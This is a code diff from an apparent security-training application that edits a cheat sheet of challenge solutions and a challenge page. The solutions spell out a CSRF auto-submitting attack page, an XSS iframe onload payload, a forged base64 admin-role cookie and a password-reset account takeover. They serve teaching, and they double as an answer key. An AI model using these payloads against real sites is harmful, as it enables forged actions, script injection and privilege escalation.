Merge branch 'dev' into csrf_adjustments

src/main/resources/i18n/cheatsheets/solutions.properties

@@ -2,7 +2,7 @@
 453d22238401e0bf6f1ff5d45996407e98e45b07.solution = To complete the lesson, the attack string is the following:<br/>&quot;https://hostname:port/root/grantComplete/csrfLesson?userId=tempId&quot;
 cd7f70faed73d2457219b951e714ebe5775515d8.solution = Input is being filtered. To complete this challenge, enter the following attack string: <br/>&lt;iframe src=&#39;#&#39; onload=&#39;alert(&quot;XSS&quot;)&#39;&gt;&lt;/iframe&gt
 2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4.solution = The user Ids in this challenge follow a sequence 1,3,5 etc. The Hidden Users ID is 11
-94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution = To complete this challenge, you must force another user to submit a post request. The easiest way to achieve this is to force the user to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallenge2&quot; action=&quot;https://hostname:port/user/csrfchallengetwo/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;userid&quot; value=&quot;exampleId&quot; /&gt;<br/>&lt;input type=&quot;submit&quot;/&gt;<br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallenge2&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the user to visit this attack page.
+94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution = To complete this challenge, you must force another user to submit a post request. The easiest way to achieve this is to force the user to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallenge2&quot; action=&quot;https://hostname:port/user/csrfchallengetwo/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;userId&quot; value=&quot;exampleId&quot; /&gt;<br/>&lt;input type=&quot;submit&quot;/&gt;<br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallenge2&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the user to visit this attack page.
 b70a84f159876bb9885b6e0087d22f0a52abbfcf.solution = Use the login function with usernames like admin, administrator, root, etc to find administrator email accounts. Use the forgotten password functionality to change the password for the email address recovered. Inspect the response of the password reset request to see what the password was reset to. Use this password to login!
 a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d.solution = Base 64 Decode the &quot;checksum&quot; cookie in the request to find it equals &quot;userRole=user&quot;. Change the value of userRole to be administrator instead. The cookies new value should be &quot;dXNlclJvbGU9YWRtaW5pc3RyYXRvcg==&quot; when you replace it.
 5ca9115f3279b9b9f3308eb6a59a4fcd374846d6.solution = To complete this challenge, you must force an admin to submit a post request. The easiest way to achieve this is to force the admin to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallenge3&quot; action=&quot;https://hostname:port/user/csrfchallengethree/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;userid&quot; value=&quot;exampleId&quot; /&gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;csrfToken&quot; value=&quot;anythingExceptNull&quot; /&gt;<br/>&lt;input type=&quot;submit&quot;/&gt;<br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallenge3&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the admin to visit this attack page.

src/main/webapp/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp

@@ -84,7 +84,7 @@
  <%= bundle.getString("challenge.intro") %>
  <br /> <br /> <a> POST /user/csrfchallengetwo/plusplus</a> <br />
  <%= bundle.getString("challenge.withThisParameter") %>
- <a>userId = <%= bundle.getString("challenge.userIdExample") %></a> <br />
+ userId = <a><%= userId %></a> <br />
  <br />
  <%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>&nbsp;<%= bundle.getString("challenge.userIdExample") %>&nbsp;<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>&nbsp;
  <br /> <br />